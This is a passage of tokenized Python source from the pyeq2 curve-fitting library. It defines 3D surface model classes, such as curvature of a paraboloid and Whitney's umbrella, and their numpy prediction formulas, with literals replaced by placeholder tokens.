inDataCacheDictionary , self ) <EOL> except : <EOL> return numpy . ones ( len ( inDataCacheDictionary [ '<STR_LIT>' ] ) ) * <NUM_LIT> <EOL> def SpecificCodeCPP ( self ) : <EOL> s = "<STR_LIT>" <EOL> return s <EOL> class GaryCler_Transform ( pyeq2 . Model_3D_BaseClass . Model_3D_BaseClass ) : <EOL> _baseName = "<STR_LIT>" <EOL> _HTML = '<STR_LIT>' <EOL> _leftSideHTML = '<STR_LIT:z>' <EOL> _coefficientDesignators = [ '<STR_LIT:a>' , '<STR_LIT:b>' , '<STR_LIT:c>' , '<STR_LIT:d>' , '<STR_LIT:f>' , '<STR_LIT:g>' , '<STR_LIT:h>' ] <EOL> _canLinearSolverBeUsedForSSQABS = False <EOL> webReferenceURL = '<STR_LIT>' <EOL> baseEquationHasGlobalMultiplierOrDivisor_UsedInExtendedVersions = True <EOL> autoGenerateOffsetForm = True <EOL> autoGenerateReciprocalForm = True <EOL> autoGenerateInverseForms = True <EOL> autoGenerateGrowthAndDecayForms = True <EOL> independentData1CannotContainZeroFlag = False <EOL> independentData1CannotContainPositiveFlag = False <EOL> independentData1CannotContainNegativeFlag = False <EOL> independentData2CannotContainZeroFlag = False <EOL> independentData2CannotContainPositiveFlag = False <EOL> independentData2CannotContainNegativeFlag = False <EOL> def GetDataCacheFunctions ( self ) : <EOL> functionList = [ ] <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . X ( NameOrValueFlag = <NUM_LIT:1> ) , [ ] ] ) <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . Y ( NameOrValueFlag = <NUM_LIT:1> ) , [ ] ] ) <EOL> return self . extendedVersionHandler . GetAdditionalDataCacheFunctions ( self , functionList ) <EOL> def CalculateModelPredictions ( self , inCoeffs , inDataCacheDictionary ) : <EOL> x_in = inDataCacheDictionary [ '<STR_LIT:X>' ] <EOL> y_in = inDataCacheDictionary [ '<STR_LIT:Y>' ] <EOL> a = inCoeffs [ <NUM_LIT:0> ] <EOL> b = inCoeffs [ <NUM_LIT:1> ] <EOL> c = inCoeffs [ <NUM_LIT:2> ] <EOL> d = inCoeffs [ <NUM_LIT:3> ] <EOL> f = inCoeffs [ <NUM_LIT:4> ] <EOL> g = inCoeffs [ <NUM_LIT:5> ] <EOL> h = inCoeffs [ <NUM_LIT:6> ] <EOL> try : <EOL> temp = a * numpy . power ( d * x_in + f , b ) * numpy . power ( g * y_in + h , c ) <EOL> return self . extendedVersionHandler . GetAdditionalModelPredictions ( temp , inCoeffs , inDataCacheDictionary , self ) <EOL> except : <EOL> return numpy . ones ( len ( inDataCacheDictionary [ '<STR_LIT>' ] ) ) * <NUM_LIT> <EOL> def SpecificCodeCPP ( self ) : <EOL> s = "<STR_LIT>" <EOL> return s <EOL> class GaussianCurvatureOfParaboloid ( pyeq2 . Model_3D_BaseClass . Model_3D_BaseClass ) : <EOL> _baseName = "<STR_LIT>" <EOL> _HTML = '<STR_LIT>' <EOL> _leftSideHTML = '<STR_LIT:z>' <EOL> _coefficientDesignators = [ '<STR_LIT:a>' ] <EOL> _canLinearSolverBeUsedForSSQABS = False <EOL> webReferenceURL = '<STR_LIT>' <EOL> baseEquationHasGlobalMultiplierOrDivisor_UsedInExtendedVersions = False <EOL> autoGenerateOffsetForm = True <EOL> autoGenerateReciprocalForm = True <EOL> autoGenerateInverseForms = True <EOL> autoGenerateGrowthAndDecayForms = True <EOL> independentData1CannotContainZeroFlag = False <EOL> independentData1CannotContainPositiveFlag = False <EOL> independentData1CannotContainNegativeFlag = False <EOL> independentData2CannotContainZeroFlag = False <EOL> independentData2CannotContainPositiveFlag = False <EOL> independentData2CannotContainNegativeFlag = False <EOL> def GetDataCacheFunctions ( self ) : <EOL> functionList = [ ] <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . XSQPLUSYSQ ( NameOrValueFlag = <NUM_LIT:1> ) , [ ] ] ) <EOL> return self . extendedVersionHandler . GetAdditionalDataCacheFunctions ( self , functionList ) <EOL> def CalculateModelPredictions ( self , inCoeffs , inDataCacheDictionary ) : <EOL> XSQPLUSYSQ = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> a = inCoeffs [ <NUM_LIT:0> ] <EOL> try : <EOL> temp = <NUM_LIT> * a * a / numpy . square ( <NUM_LIT:1.0> + <NUM_LIT> * a * a * XSQPLUSYSQ ) <EOL> return self . extendedVersionHandler . GetAdditionalModelPredictions ( temp , inCoeffs , inDataCacheDictionary , self ) <EOL> except : <EOL> return numpy . ones ( len ( inDataCacheDictionary [ '<STR_LIT>' ] ) ) * <NUM_LIT> <EOL> def SpecificCodeCPP ( self ) : <EOL> s = "<STR_LIT>" <EOL> return s <EOL> class GaussianCurvatureOfParaboloid_scaled ( pyeq2 . Model_3D_BaseClass . Model_3D_BaseClass ) : <EOL> _baseName = "<STR_LIT>" <EOL> _HTML = '<STR_LIT>' <EOL> _leftSideHTML = '<STR_LIT:z>' <EOL> _coefficientDesignators = [ '<STR_LIT:a>' , '<STR_LIT>' ] <EOL> _canLinearSolverBeUsedForSSQABS = False <EOL> webReferenceURL = '<STR_LIT>' <EOL> baseEquationHasGlobalMultiplierOrDivisor_UsedInExtendedVersions = True <EOL> autoGenerateOffsetForm = True <EOL> autoGenerateReciprocalForm = True <EOL> autoGenerateInverseForms = True <EOL> autoGenerateGrowthAndDecayForms = True <EOL> independentData1CannotContainZeroFlag = False <EOL> independentData1CannotContainPositiveFlag = False <EOL> independentData1CannotContainNegativeFlag = False <EOL> independentData2CannotContainZeroFlag = False <EOL> independentData2CannotContainPositiveFlag = False <EOL> independentData2CannotContainNegativeFlag = False <EOL> def GetDataCacheFunctions ( self ) : <EOL> functionList = [ ] <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . XSQPLUSYSQ ( NameOrValueFlag = <NUM_LIT:1> ) , [ ] ] ) <EOL> return self . extendedVersionHandler . GetAdditionalDataCacheFunctions ( self , functionList ) <EOL> def CalculateModelPredictions ( self , inCoeffs , inDataCacheDictionary ) : <EOL> XSQPLUSYSQ = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> a = inCoeffs [ <NUM_LIT:0> ] <EOL> scale = inCoeffs [ <NUM_LIT:1> ] <EOL> try : <EOL> temp = scale * <NUM_LIT> * a * a / numpy . square ( <NUM_LIT:1.0> + <NUM_LIT> * a * a * XSQPLUSYSQ ) <EOL> return self . extendedVersionHandler . GetAdditionalModelPredictions ( temp , inCoeffs , inDataCacheDictionary , self ) <EOL> except : <EOL> return numpy . ones ( len ( inDataCacheDictionary [ '<STR_LIT>' ] ) ) * <NUM_LIT> <EOL> def SpecificCodeCPP ( self ) : <EOL> s = "<STR_LIT>" <EOL> return s <EOL> class GaussianCurvatureOfRichmondsMinimalSurface ( pyeq2 . Model_3D_BaseClass . Model_3D_BaseClass ) : <EOL> _baseName = "<STR_LIT>" <EOL> _HTML = '<STR_LIT>' <EOL> _leftSideHTML = '<STR_LIT:z>' <EOL> _coefficientDesignators = [ '<STR_LIT:a>' , '<STR_LIT:b>' ] <EOL> _canLinearSolverBeUsedForSSQABS = False <EOL> webReferenceURL = '<STR_LIT>' <EOL> baseEquationHasGlobalMultiplierOrDivisor_UsedInExtendedVersions = True <EOL> autoGenerateOffsetForm = True <EOL> autoGenerateReciprocalForm = True <EOL> autoGenerateInverseForms = True <EOL> autoGenerateGrowthAndDecayForms = True <EOL> independentData1CannotContainZeroFlag = False <EOL> independentData1CannotContainPositiveFlag = False <EOL> independentData1CannotContainNegativeFlag = False <EOL> independentData2CannotContainZeroFlag = False <EOL> independentData2CannotContainPositiveFlag = False <EOL> independentData2CannotContainNegativeFlag = False <EOL> def GetDataCacheFunctions ( self ) : <EOL> functionList = [ ] <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . XSQPLUSYSQ ( NameOrValueFlag = <NUM_LIT:1> ) , [ ] ] ) <EOL> return self . extendedVersionHandler . GetAdditionalDataCacheFunctions ( self , functionList ) <EOL> def CalculateModelPredictions ( self , inCoeffs , inDataCacheDictionary ) : <EOL> XSQPLUSYSQ = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> a = inCoeffs [ <NUM_LIT:0> ] <EOL> b = inCoeffs [ <NUM_LIT:1> ] <EOL> try : <EOL> temp = - <NUM_LIT:1.0> * a * numpy . power ( XSQPLUSYSQ , <NUM_LIT> ) / numpy . power ( b + numpy . square ( XSQPLUSYSQ ) , <NUM_LIT> ) <EOL> return self . extendedVersionHandler . GetAdditionalModelPredictions ( temp , inCoeffs , inDataCacheDictionary , self ) <EOL> except : <EOL> return numpy . ones ( len ( inDataCacheDictionary [ '<STR_LIT>' ] ) ) * <NUM_LIT> <EOL> def SpecificCodeCPP ( self ) : <EOL> s = "<STR_LIT>" <EOL> return s <EOL> class GaussianCurvatureOfWhitneysUmbrellaA ( pyeq2 . Model_3D_BaseClass . Model_3D_BaseClass ) : <EOL> _baseName = "<STR_LIT>" <EOL> _HTML = '<STR_LIT>' <EOL> _leftSideHTML = '<STR_LIT:z>' <EOL> _coefficientDesignators = [ '<STR_LIT:a>' ] <EOL> _canLinearSolverBeUsedForSSQABS = False <EOL> webReferenceURL = '<STR_LIT>' <EOL> baseEquationHasGlobalMultiplierOrDivisor_UsedInExtendedVersions = False <EOL> autoGenerateOffsetForm = True <EOL> autoGenerateReciprocalForm = True <EOL> autoGenerateInverseForms = True <EOL> autoGenerateGrowthAndDecayForms = True <EOL> independentData1CannotContainZeroFlag = False <EOL> independentData1CannotContainPositiveFlag = False <EOL> independentData1CannotContainNegativeFlag = False <EOL> independentData2CannotContainZeroFlag = False <EOL> independentData2CannotContainPositiveFlag = False <EOL> independentData2CannotContainNegativeFlag = False <EOL> def GetDataCacheFunctions ( self ) : <EOL> functionList = [ ] <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . PowX ( NameOrValueFlag = <NUM_LIT:1> , args = [ <NUM_LIT> ] ) , [ <NUM_LIT> ] ] ) <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . PowY ( NameOrValueFlag = <NUM_LIT:1> , args = [ <NUM_LIT> ] ) , [ <NUM_LIT> ] ] ) <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . PowY ( NameOrValueFlag = <NUM_LIT:1> , args = [ <NUM_LIT> ] ) , [ <NUM_LIT> ] ] ) <EOL> return self . extendedVersionHandler . GetAdditionalDataCacheFunctions ( self , functionList ) <EOL> def CalculateModelPredictions ( self , inCoeffs , inDataCacheDictionary ) : <EOL> PowX2 = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> PowY2 = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> PowY4 = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> a = inCoeffs [ <NUM_LIT:0> ] <EOL> try : <EOL> temp = - <NUM_LIT:1.0> * a * PowY2 / numpy . square ( PowX2 + a * ( PowY2 + PowY4 ) ) <EOL> return self . extendedVersionHandler . GetAdditionalModelPredictions ( temp , inCoeffs , inDataCacheDictionary , self ) <EOL> except : <EOL> return numpy . ones ( len ( inDataCacheDictionary [ '<STR_LIT>' ] ) ) * <NUM_LIT> <EOL> def SpecificCodeCPP ( self ) : <EOL> s = "<STR_LIT>" <EOL> return s <EOL> class GaussianCurvatureOfWhitneysUmbrellaB ( pyeq2 . Model_3D_BaseClass . Model_3D_BaseClass ) : <EOL> _baseName = "<STR_LIT>" <EOL> _HTML = '<STR_LIT>' <EOL> _leftSideHTML = '<STR_LIT:z>' <EOL> _coefficientDesignators = [ '<STR_LIT:a>' ] <EOL> _canLinearSolverBeUsedForSSQABS = False <EOL> webReferenceURL = '<STR_LIT>' <EOL> baseEquationHasGlobalMultiplierOrDivisor_UsedInExtendedVersions = False <EOL> autoGenerateOffsetForm = True <EOL> autoGenerateReciprocalForm = True <EOL> autoGenerateInverseForms = True <EOL> autoGenerateGrowthAndDecayForms = True <EOL> independentData1CannotContainZeroFlag = False <EOL> independentData1CannotContainPositiveFlag = False <EOL> independentData1CannotContainNegativeFlag = False <EOL> independentData2CannotContainZeroFlag = False <EOL> independentData2CannotContainPositiveFlag = False <EOL> independentData2CannotContainNegativeFlag = False <EOL> def GetDataCacheFunctions ( self ) : <EOL> functionList = [ ] <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . PowY ( NameOrValueFlag = <NUM_LIT:1> , args = [ <NUM_LIT> ] ) , [ <NUM_LIT> ] ] ) <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . PowX ( NameOrValueFlag = <NUM_LIT:1> , args = [ <NUM_LIT> ] ) , [ <NUM_LIT> ] ] ) <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . PowX ( NameOrValueFlag = <NUM_LIT:1> , args = [ <NUM_LIT> ] ) , [ <NUM_LIT> ] ] ) <EOL> return self . extendedVersionHandler . GetAdditionalDataCacheFunctions ( self , functionList ) <EOL> def CalculateModelPredictions ( self , inCoeffs , inDataCacheDictionary ) : <EOL> PowY2 = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> PowX2 = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> PowX4 = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> a = inCoeffs [ <NUM_LIT:0> ] <EOL> try : <EOL> temp = - <NUM_LIT:1.0> * a * PowX2 / numpy . square ( PowY2 + a * ( PowX2 + PowX4 ) ) <EOL> return self . extendedVersionHandler . GetAdditionalModelPredictions ( temp , inCoeffs , inDataCacheDictionary , self ) <EOL> except : <EOL> return numpy . ones ( len ( inDataCacheDictionary [ '<STR_LIT>' ] ) ) * <NUM_LIT> <EOL> def SpecificCodeCPP ( self ) : <EOL> s = "<STR_LIT>" <EOL> return s <EOL> class LipingZheng ( pyeq2 . Model_3D_BaseClass . Model_3D_BaseClass ) : <EOL> _baseName = "<STR_LIT>" <EOL> _HTML = '<STR_LIT>' <EOL> _leftSideHTML = '<STR_LIT:z>' <EOL> _coefficientDesignators = [ '<STR_LIT:a>' , '<STR_LIT:b>' , '<STR_LIT:c>' ] <EOL> _canLinearSolverBeUsedForSSQABS = False <EOL> webReferenceURL = '<STR_LIT>' <EOL> baseEquationHasGlobalMultiplierOrDivisor_UsedInExtendedVersions = False <EOL> autoGenerateOffsetForm = True <EOL> autoGenerateReciprocalForm = True <EOL> autoGenerateInverseForms = True <EOL> autoGenerateGrowthAndDecayForms = True <EOL> independentData1CannotContainZeroFlag = False <EOL> independentData1CannotContainPositiveFlag = False <EOL> independentData1CannotContainNegativeFlag = True <EOL> independentData2CannotContainZeroFlag = False <EOL> independentData2CannotContainPositiveFlag = False <EOL> independentData2CannotContainNegativeFlag = True <EOL> def GetDataCacheFunctions ( self ) : <EOL> functionList = [ ] <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . PowX_PowY ( NameOrValueFlag = <NUM_LIT:1> , args = [ <NUM_LIT> , <NUM_LIT:1.0> ] ) , [ <NUM_LIT> , <NUM_LIT:1.0> ] ] ) <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . PowX_PowY ( NameOrValueFlag = <NUM_LIT:1> , args = [ <NUM_LIT> , <NUM_LIT> ] ) , [ <NUM_LIT> , <NUM_LIT> ] ] ) <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . PowX_PowY ( NameOrValueFlag = <NUM_LIT:1> , args = [ <NUM_LIT> , <NUM_LIT> ] ) , [ <NUM_LIT> , <NUM_LIT> ] ] ) <EOL> return self . extendedVersionHandler . GetAdditionalDataCacheFunctions ( self , functionList ) <EOL> def CalculateModelPredictions ( self , inCoeffs , inDataCacheDictionary ) : <EOL> PowX_PowY21 = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> PowX_PowY22 = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> PowX_PowY15_15 = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> a = inCoeffs [ <NUM_LIT:0> ] <EOL> b = inCoeffs [ <NUM_LIT:1> ] <EOL> c = inCoeffs [ <NUM_LIT:2> ] <EOL> try : <EOL> temp = a * PowX_PowY21 + b * PowX_PowY22 + c * PowX_PowY15_15 <EOL> return self . extendedVersionHandler . GetAdditionalModelPredictions ( temp , inCoeffs , inDataCacheDictionary , self ) <EOL> except : <EOL> return numpy . ones ( len ( inDataCacheDictionary [ '<STR_LIT>' ] ) ) * <NUM_LIT> <EOL> def SpecificCodeCPP ( self ) : <EOL> s = "<STR_LIT>" <EOL> return s <EOL> class MeanCurvatureOfParaboloid ( pyeq2 . Model_3D_BaseClass . Model_3D_BaseClass ) : <EOL> _baseName = "<STR_LIT>" <EOL> _HTML = '<STR_LIT>' <EOL> _leftSideHTML = '<STR_LIT:z>' <EOL> _coefficientDesignators = [ '<STR_LIT:a>' ] <EOL> _canLinearSolverBeUsedForSSQABS = False <EOL> webReferenceURL = '<STR_LIT>' <EOL> baseEquationHasGlobalMultiplierOrDivisor_UsedInExtendedVersions = False <EOL> autoGenerateOffsetForm = True <EOL> autoGenerateReciprocalForm = True <EOL> autoGenerateInverseForms = True <EOL> autoGenerateGrowthAndDecayForms = True <EOL> independentData1CannotContainZeroFlag = False <EOL> independentData1CannotContainPositiveFlag = False <EOL> independentData1CannotContainNegativeFlag = False <EOL> independentData2CannotContainZeroFlag = False <EOL> independentData2CannotContainPositiveFlag = False <EOL> independentData2CannotContainNegativeFlag = False <EOL> def GetDataCacheFunctions ( self ) : <EOL> functionList = [ ] <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . XSQPLUSYSQ ( NameOrValueFlag = <NUM_LIT:1> ) , [ ] ] ) <EOL> return self . extendedVersionHandler . GetAdditionalDataCacheFunctions ( self , functionList ) <EOL> def CalculateModelPredictions ( self , inCoeffs , inDataCacheDictionary ) : <EOL> XSQPLUSYSQ = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> a = inCoeffs [ <NUM_LIT:0> ] <EOL> try : <EOL> temp = <NUM_LIT> * ( a + <NUM_LIT> * numpy . power ( a , <NUM_LIT> ) * XSQPLUSYSQ ) / numpy . power ( <NUM_LIT:1.0> + <NUM_LIT> * a * a * XSQPLUSYSQ , <NUM_LIT> ) <EOL> return self . extendedVersionHandler . GetAdditionalModelPredictions ( temp , inCoeffs , inDataCacheDictionary , self ) <EOL> except : <EOL> return numpy . ones ( len ( inDataCacheDictionary [ '<STR_LIT>' ] ) ) * <NUM_LIT> <EOL> def SpecificCodeCPP ( self ) : <EOL> s = "<STR_LIT>" <EOL> return s <EOL> class MeanCurvatureOfParaboloid_scaled ( pyeq2 . Model_3D_BaseClass . Model_3D_BaseClass ) : <EOL> _baseName = "<STR_LIT>" <EOL> _HTML = '<STR_LIT>' <EOL> _leftSideHTML = '<STR_LIT:z>' <EOL> _coefficientDesignators = [ '<STR_LIT:a>' , '<STR_LIT>' ] <EOL> _canLinearSolverBeUsedForSSQABS = False <EOL> webReferenceURL = '<STR_LIT>' <EOL> baseEquationHasGlobalMultiplierOrDivisor_UsedInExtendedVersions = True <EOL> autoGenerateOffsetForm = True <EOL> autoGenerateReciprocalForm = True <EOL> autoGenerateInverseForms = True <EOL> autoGenerateGrowthAndDecayForms = True <EOL> independentData1CannotContainZeroFlag = False <EOL> independentData1CannotContainPositiveFlag = False <EOL> independentData1CannotContainNegativeFlag = False <EOL> independentData2CannotContainZeroFlag = False <EOL> independentData2CannotContainPositiveFlag = False <EOL> independentData2CannotContainNegativeFlag = False <EOL> def GetDataCacheFunctions ( self ) : <EOL> functionList = [ ] <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . XSQPLUSYSQ ( NameOrValueFlag = <NUM_LIT:1> ) , [ ] ] ) <EOL> return self . extendedVersionHandler . GetAdditionalDataCacheFunctions ( self , functionList ) <EOL> def CalculateModelPredictions ( self , inCoeffs , inDataCacheDictionary ) : <EOL> XSQPLUSYSQ = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> a = inCoeffs [ <NUM_LIT:0> ] <EOL> scale = inCoeffs [ <NUM_LIT:1> ] <EOL> try : <EOL> temp = scale * ( a + <NUM_LIT> * numpy . power ( a , <NUM_LIT> ) * XSQPLUSYSQ ) / numpy . power ( <NUM_LIT:1.0> + <NUM_LIT> * a * a * XSQPLUSYSQ , <NUM_LIT> ) <EOL> return self . extendedVersionHandler . GetAdditionalModelPredictions ( temp , inCoeffs , inDataCacheDictionary , self ) <EOL> except : <EOL> return numpy . ones ( len ( inDataCacheDictionary [ '<STR_LIT>' ] ) ) * <NUM_LIT> <EOL> def SpecificCodeCPP ( self ) : <EOL> s = "<STR_LIT>" <EOL> return s <EOL> class MeanCurvatureOfWhitneysUmbrellaA ( pyeq2 . Model_3D_BaseClass . Model_3D_BaseClass ) : <EOL> _baseName = "<STR_LIT>" <EOL> _HTML = '<STR_LIT>' <EOL> _leftSideHTML = '<STR_LIT:z>' <EOL> _coefficientDesignators = [ '<STR_LIT:a>' , '<STR_LIT:b>' ] <EOL> _canLinearSolverBeUsedForSSQABS = False <EOL> webReferenceURL = '<STR_LIT>' <EOL> baseEquationHasGlobalMultiplierOrDivisor_UsedInExtendedVersions = False <EOL> autoGenerateOffsetForm = True <EOL> autoGenerateReciprocalForm = True <EOL> autoGenerateInverseForms = True <EOL> autoGenerateGrowthAndDecayForms = True <EOL> independentData1CannotContainZeroFlag = False <EOL> independentData1CannotContainPositiveFlag = False <EOL> independentData1CannotContainNegativeFlag = False <EOL> independentData2CannotContainZeroFlag = False <EOL> independentData2CannotContainPositiveFlag = False <EOL> independentData2CannotContainNegativeFlag = False <EOL> def GetDataCacheFunctions ( self ) : <EOL> functionList = [ ] <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . X ( NameOrValueFlag = <NUM_LIT:1> ) , [ ] ] ) <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . PowX ( NameOrValueFlag = <NUM_LIT:1> , args = [ <NUM_LIT> ] ) , [ <NUM_LIT> ] ] ) <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . PowY ( NameOrValueFlag = <NUM_LIT:1> , args = [ <NUM_LIT> ] ) , [ <NUM_LIT> ] ] ) <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . PowY ( NameOrValueFlag = <NUM_LIT:1> , args = [ <NUM_LIT> ] ) , [ <NUM_LIT> ] ] ) <EOL> return self . extendedVersionHandler . GetAdditionalDataCacheFunctions ( self , functionList ) <EOL> def CalculateModelPredictions ( self , inCoeffs , inDataCacheDictionary ) : <EOL> x_in = inDataCacheDictionary [ '<STR_LIT:X>' ] <EOL> PowX2 = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> PowY2 = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> PowY4 = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> a = inCoeffs [ <NUM_LIT:0> ] <EOL> b = inCoeffs [ <NUM_LIT:1> ] <EOL> try : <EOL> temp = - <NUM_LIT:1.0> * x_in * ( a + b * PowY2 ) / numpy . power ( PowX2 + a * ( PowY2 + PowY4 ) , <NUM_LIT> ) <EOL> return self . extendedVersionHandler . GetAdditionalModelPredictions ( temp , inCoeffs , inDataCacheDictionary , self ) <EOL> except : <EOL> return numpy . ones ( len ( inDataCacheDictionary [ '<STR_LIT>' ] ) ) * <NUM_LIT> <EOL> def SpecificCodeCPP ( self ) : <EOL> s = "<STR_LIT>" <EOL> return s <EOL> class MeanCurvatureOfWhitneysUmbrellaB ( pyeq2 . Model_3D_BaseClass . Model_3D_BaseClass ) : <EOL> _baseName = "<STR_LIT>" <EOL> _HTML = '<STR_LIT>' <EOL> _leftSideHTML = '<STR_LIT:z>' <EOL> _coefficientDesignators = [ '<STR_LIT:a>' , '<STR_LIT:b>' ] <EOL> _canLinearSolverBeUsedForSSQABS = False <EOL> webReferenceURL = '<STR_LIT>' <EOL> baseEquationHasGlobalMultiplierOrDivisor_UsedInExtendedVersions = False <EOL> autoGenerateOffsetForm = True <EOL> autoGenerateReciprocalForm = True <EOL> autoGenerateInverseForms = True <EOL> autoGenerateGrowthAndDecayForms = True <EOL> independentData1CannotContainZeroFlag = False <EOL> independentData1CannotContainPositiveFlag = False <EOL> independentData1CannotContainNegativeFlag = False <EOL> independentData2CannotContainZeroFlag = False <EOL> independentData2CannotContainPositiveFlag = False <EOL> independentData2CannotContainNegativeFlag = False <EOL> def GetDataCacheFunctions ( self ) : <EOL> functionList = [ ] <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . Y ( NameOrValueFlag = <NUM_LIT:1> ) , [ ] ] ) <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . PowY ( NameOrValueFlag = <NUM_LIT:1> , args = [ <NUM_LIT> ] ) , [ <NUM_LIT> ] ] ) <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . PowX ( NameOrValueFlag = <NUM_LIT:1> , args = [ <NUM_LIT> ] ) , [ <NUM_LIT> ] ] ) <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . PowX ( NameOrValueFlag = <NUM_LIT:1> , args = [ <NUM_LIT> ] ) , [ <NUM_LIT> ] ] ) <EOL> return self . extendedVersionHandler . GetAdditionalDataCacheFunctions ( self , functionList ) <EOL> def CalculateModelPredictions ( self , inCoeffs , inDataCacheDictionary ) : <EOL> y_in = inDataCacheDictionary [ '<STR_LIT:Y>' ] <EOL> PowY2 = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> PowX2 = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> PowX4 = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> a = inCoeffs [ <NUM_LIT:0> ] <EOL> b = inCoeffs [ <NUM_LIT:1> ] <EOL> try : <EOL> temp = - <NUM_LIT:1.0> * y_in * ( a + b * PowX2 ) / pow ( PowY2 + a * ( PowX2 + PowX4 ) , <NUM_LIT> ) <EOL> return self . extendedVersionHandler . GetAdditionalModelPredictions ( temp , inCoeffs , inDataCacheDictionary , self ) <EOL> except : <EOL> return numpy . ones ( len ( inDataCacheDictionary [ '<STR_LIT>' ] ) ) * <NUM_LIT> <EOL> def SpecificCodeCPP ( self ) : <EOL> s = "<STR_LIT>" <EOL> return s <EOL> class MennSurfaceA ( pyeq2 . Model_3D_BaseClass . Model_3D_BaseClass ) : <EOL> _baseName = "<STR_LIT>" <EOL> _HTML = '<STR_LIT>' <EOL> _leftSideHTML = '<STR_LIT:z>' <EOL> _coefficientDesignators = [ '<STR_LIT:a>' , '<STR_LIT:b>' , '<STR_LIT:c>' ] <EOL> _canLinearSolverBeUsedForSSQABS = False <EOL> webReferenceURL = '<STR_LIT>' <EOL> baseEquationHasGlobalMultiplierOrDivisor_UsedInExtendedVersions = False <EOL> autoGenerateOffsetForm = True <EOL> autoGenerateReciprocalForm = True <EOL> autoGenerateInverseForms = True <EOL> autoGenerateGrowthAndDecayForms = True <EOL> independentData1CannotContainZeroFlag = False <EOL> independentData1CannotContainPositiveFlag = False <EOL> independentData1CannotContainNegativeFlag = False <EOL> independentData2CannotContainZeroFlag = False <EOL> independentData2CannotContainPositiveFlag = False <EOL> independentData2CannotContainNegativeFlag = False <EOL> def GetDataCacheFunctions ( self ) : <EOL> functionList = [ ] <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . PowX ( NameOrValueFlag = <NUM_LIT:1> , args = [ <NUM_LIT> ] ) , [ <NUM_LIT> ] ] ) <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . PowX ( NameOrValueFlag = <NUM_LIT:1> , args = [ <NUM_LIT> ] ) , [ <NUM_LIT> ] ] ) <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . Y ( NameOrValueFlag = <NUM_LIT:1> ) , [ ] ] ) <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . PowY ( NameOrValueFlag = <NUM_LIT:1> , args = [ <NUM_LIT> ] ) , [ <NUM_LIT> ] ] ) <EOL> return self . extendedVersionHandler . GetAdditionalDataCacheFunctions ( self , functionList ) <EOL> def CalculateModelPredictions ( self , inCoeffs , inDataCacheDictionary ) : <EOL> PowX_2 = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> PowX_4 = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> y_in = inDataCacheDictionary [ '<STR_LIT:Y>' ] <EOL> PowY_2 = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> a = inCoeffs [ <NUM_LIT:0> ] <EOL> b = inCoeffs [ <NUM_LIT:1> ] <EOL> c = inCoeffs [ <NUM_LIT:2> ] <EOL> try : <EOL> temp = a * PowX_4 + b * PowX_2 * y_in - c * PowY_2 <EOL> return self . extendedVersionHandler . GetAdditionalModelPredictions ( temp , inCoeffs , inDataCacheDictionary , self ) <EOL> except : <EOL> return numpy . ones ( len ( inDataCacheDictionary [ '<STR_LIT>' ] ) ) * <NUM_LIT> <EOL> def SpecificCodeCPP ( self ) : <EOL> s = "<STR_LIT>" <EOL> return s <EOL> class MennSurfaceB ( pyeq2 . Model_3D_BaseClass . Model_3D_BaseClass ) : <EOL> _baseName = "<STR_LIT>" <EOL> _HTML = '<STR_LIT>' <EOL> _leftSideHTML = '<STR_LIT:z>' <EOL> _coefficientDesignators = [ '<STR_LIT:a>' , '<STR_LIT:b>' , '<STR_LIT:c>' ] <EOL> _canLinearSolverBeUsedForSSQABS = False <EOL> webReferenceURL = '<STR_LIT>' <EOL> baseEquationHasGlobalMultiplierOrDivisor_UsedInExtendedVersions = False <EOL> autoGenerateOffsetForm = True <EOL> autoGenerateReciprocalForm = True <EOL> autoGenerateInverseForms = True <EOL> autoGenerateGrowthAndDecayForms = True <EOL> 